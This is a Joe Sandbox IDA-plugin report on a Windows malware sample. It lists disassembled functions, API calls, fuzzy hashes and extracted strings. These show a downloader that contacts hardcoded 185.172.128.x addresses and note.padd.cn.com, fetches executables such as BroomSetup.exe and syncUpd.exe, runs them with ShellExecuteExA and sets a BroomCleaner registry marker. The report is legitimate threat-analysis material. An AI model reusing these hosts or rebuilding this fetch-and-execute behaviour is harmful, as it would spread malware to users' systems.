Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

sub=([\w-]{1,255}), xrefs: 00424AA2
/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
\run.exe, xrefs: 00425BD0, 00425C28
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
P, xrefs: 00425855
P, xrefs: 00425EE3
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D
two, xrefs: 00424B5F, 00424B7A, 00424D9B
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
.exe, xrefs: 004258B1, 004258D3
P, xrefs: 00425B10
P, xrefs: 004254F5
P, xrefs: 004250AB
Installed, xrefs: 004251FF, 0042525D
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
.exe, xrefs: 00425F26, 00425F48
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
.zip, xrefs: 00425B5D, 00425B7F
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com$sub=([\w-]{1,255})$two
API String ID: 2531350358-3033353151
Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 040F5BD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 040F5BFE
Module32First.KERNEL32(00000000,00000224), ref: 040F5C1E

Memory Dump Source

Source File: 00000000.00000002.1985953400.00000000040F5000.00000040.00000020.00020000.00000000.sdmp, Offset: 040F5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40f5000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 261877529ea2fb54d62a735033cd39f8f924ec94d314ab2a8d179d940bddd4d5
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 49F06231110711BFE7203AF59C8DA6E76E8AF49625F100578E743A58C1DB70F84646A1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05B6003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05B6024D

Strings

kernel32.dll, xrefs: 05B6008F, 05B60095
cess, xrefs: 05B6018D

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: e09016a99a90e5811c8eec0892535db24aa1306db852cba515d0009b53bff698
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 6D526974A01229DFDB64CF59C984BACBBB1BF09304F1480E9E94DAB351DB34AA85CF15

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A
Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Strings

@, xrefs: 00419D84

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
Opcode Fuzzy Hash: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05B60E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,05B60223,?,?), ref: 05B60E19
SetErrorMode.KERNEL32(00000000,?,?,05B60223,?,?), ref: 05B60E1E

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 3e0aa8743782800158683d77dbeedf7124d26355c5c09d01931b5454394fd244
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: EDD0123154512C77D7003A95DC0DBCD7B1CEF09B62F008051FB0DD9080C774954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
